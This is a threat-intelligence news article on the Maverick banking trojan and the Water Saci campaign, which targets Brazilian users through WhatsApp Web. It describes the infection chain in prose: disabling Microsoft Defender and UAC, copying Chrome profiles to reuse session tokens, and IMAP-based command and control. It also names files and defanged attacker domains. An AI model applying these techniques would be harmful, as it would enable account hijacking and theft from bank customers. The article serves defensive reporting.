Threat hunters reported technical similarities between a known Brazilian banking trojan called Coyote and a newly described threat named Maverick, saying both are written in .NET, target Brazilian users and banks, and share functionality to decrypt traffic, monitor banking applications and target banking URLs. CyberProof detailed those findings in a report, and analysts noted both families include the ability to spread through WhatsApp Web.
Security vendor Trend Micro documented Maverick and attributed its use to a group it calls Water Saci, describing a campaign that uses a self-propagating component named SORVEPOTEL to distribute a ZIP archive containing the Maverick payload. Trend Micro said the campaign relies on WhatsApp Web automation and an initial downloader that runs inside users’ desktop browser sessions.
CyberProof reported that the delivered ZIP contains a Windows shortcut that, when launched, runs cmd.exe or PowerShell to contact an external host (zapgrande[.]com) to download a first-stage payload. The PowerShell routines can disable Microsoft Defender and UAC and retrieve a .NET loader that uses anti-analysis checks, then fetches the SORVEPOTEL and Maverick modules. The analysis noted Maverick is staged only after locale checks such as time zone, language and date format indicate the host is in Brazil.
Trend Micro described a revised Water Saci attack chain that avoids .NET launchers in favor of Visual Basic Script and PowerShell to hijack WhatsApp browser sessions and propagate the ZIP file, using browser automation tools including ChromeDriver and Selenium. The malware copies a victim’s Chrome profile data to a temporary workspace to reuse cookies and authentication tokens, a step the vendor said allows it to bypass WhatsApp Web authentication without QR re-scan.
The campaign’s downloader is an obfuscated VBS file named “Orcamento.vbs” (identified as SORVEPOTEL) that invokes a PowerShell script called “tadeu.ps1” directly in memory. That script remotely controls the victim’s WhatsApp Web session to send the malicious ZIP to harvested contacts, display a deceptive banner labeled “WhatsApp Automation v6.0”, and retrieve message templates and contact lists from a command-and-control server, researchers said.
Analysts also described an email-based command-and-control mechanism that uses IMAP connections to attacker-controlled terra.com[.]br accounts to retrieve C2 URLs; multi-factor protection on some of those accounts has introduced manual delays because the actors must enter one-time codes. The backdoor supports a wide set of remote commands for information collection, file operations, process control, screenshots and software updates, according to the report.
Researchers noted the campaign may be expanding targeting, including hotels in Brazil, and said the convergence of techniques suggests Water Saci is likely linked to Coyote, though other firms have cautioned that Maverick exhibits distinct characteristics and treated it as a new, widespread threat. The reliance on WhatsApp is notable given the app’s popularity in Brazil, which has 148 million active users.